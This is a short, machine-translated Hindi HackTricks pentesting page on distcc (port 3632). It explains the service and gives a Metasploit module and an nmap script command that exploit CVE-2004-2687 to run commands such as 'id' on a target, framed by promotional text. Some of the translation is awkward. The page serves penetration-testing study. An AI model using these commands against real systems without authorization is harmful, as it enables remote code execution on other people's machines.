3632 - Pentesting distcc

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

अगर आप चाहते हैं कि आपकी कंपनी HackTricks में विज्ञापित हो या HackTricks को PDF में डाउनलोड करें तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs संग्रह, The PEASS Family खोजें
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
अपने हैकिंग ट्रिक्स साझा करें, HackTricks के HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।

मूल जानकारी

Distcc एक टूल है जो संगठन प्रक्रिया को बढ़ाता है जिससे नेटवर्क में अन्य कंप्यूटरों की निष्क्रिय प्रोसेसिंग पावर का उपयोग किया जा सकता है। जब distcc एक मशीन पर सेट किया जाता है, तो यह मशीन अपने कंपाइलेशन टास्क को दूसरे सिस्टम में वितरित करने में सक्षम होती है। इस प्राप्तकर्ता सिस्टम पर distccd डेमन चल रहा होना चाहिए और भेजे गए कोड को प्रोसेस करने के लिए एक संगत कंपाइलर इंस्टॉल किया होना चाहिए।

डिफ़ॉल्ट पोर्ट: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

शोध

जांचें कि CVE-2004-2687 के लिए यह वंशावली है ताकि विचारशील कोड को क्रियान्वित किया जा सके:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

मुझे लगता है कि शोडन इस सेवा को नहीं पहचानता।

संसाधन

Post created by Álex B (@r1p)

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
जुड़ें 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह में या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो करें।
अपने हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 1 month ago